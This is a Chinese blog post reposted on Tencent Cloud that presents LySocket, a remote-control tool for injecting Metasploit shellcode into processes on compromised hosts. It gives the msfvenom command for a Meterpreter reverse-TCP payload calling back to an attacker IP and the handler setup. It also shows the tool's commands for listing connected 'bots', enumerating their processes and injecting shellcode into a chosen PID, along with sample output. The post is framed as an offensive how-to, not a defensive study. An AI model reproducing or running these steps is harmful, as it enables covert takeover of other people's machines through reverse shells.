前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >LySocket 远程ShellCode种植远控

LySocket 远程ShellCode种植远控

作者头像
微软技术分享
发布2022-12-28 17:42:10
8760
发布2022-12-28 17:42:10

LySocket 是一款使用纯 WindowsAPI 实现的命令行版远程控制工具,该工具通过最少的代码实现了套接字的批量管理操作,用户可以指定对远程主机内特定进程注入ShellCode攻击载荷,只要对端LyClient客户端能一直运行,则Metasploit攻击载荷就可以很方便的注入到目标主机任意的进程内反弹。

GitHUB地址:https://github.com/lyshark/LySocket

首先需要通过Metasploit工具生成一个有效载荷。

代码语言:javascript
复制
[root@lyshark ~]# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.93.128 LPORT=9999 -f c

后台侦听器的配置,使用时需要与载荷的位数相对应。

代码语言:javascript
复制
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost 192.168.93.128
msf6 > set lport 9999
msf6 exploit(multi/handler) > exploit
  • 输出当前在线的客户端列表

命令ShowSocket可输出当前有多少肉鸡上线了,用于确定对端IP地址,该套接字列表程序内会自动维护,如果客户端下线则Socket套接字将会被清理。

代码语言:javascript
复制
[ LySocket ] # ShowSocket
--------------------------------------------------------------------
索引             客户端地址              端口            状态
--------------------------------------------------------------------
0                127.0.0.1               1763            Open
1                127.0.0.1               1806            Open
2                127.0.0.1               1807            Open
3                127.0.0.1               1808            Open
--------------------------------------------------------------------
  • 获取客户端进程列表

命令GetProcessList可用于得到对段主机内有哪些进程正在运行,这是注入代码的前提条件。

代码语言:javascript
复制
[ LySocket ] # GetProcessList --address 127.0.0.1
--------------------------------------------------------------------
索引             进程PID                 进程位数                进程名
--------------------------------------------------------------------
0                4       x64             System
1                124     x64             Registry
2                568     x64             smss.exe
3                856     x64             csrss.exe
4                956     x64             wininit.exe
5                964     x64             csrss.exe
6                80      x64             services.exe
7                484     x64             lsass.exe
8                564     x64             winlogon.exe
9                672     x64             svchost.exe
10               1060    x64             fontdrvhost.exe
11               1068    x64             fontdrvhost.exe
12               1100    x64             WUDFHost.exe
--------------------------------------------------------------------
  • 注入ShellCode到指定进程内

使用如下命令注入ShellCode到特定进程内,此时Metasploit即可看到反弹的了。

代码语言:javascript
复制
[ LySocket ] # InjectRemoteCode --address 127.0.0.1 --pid 1068 --shellcode xfec12defferciruq
[+] Success..
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-07-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档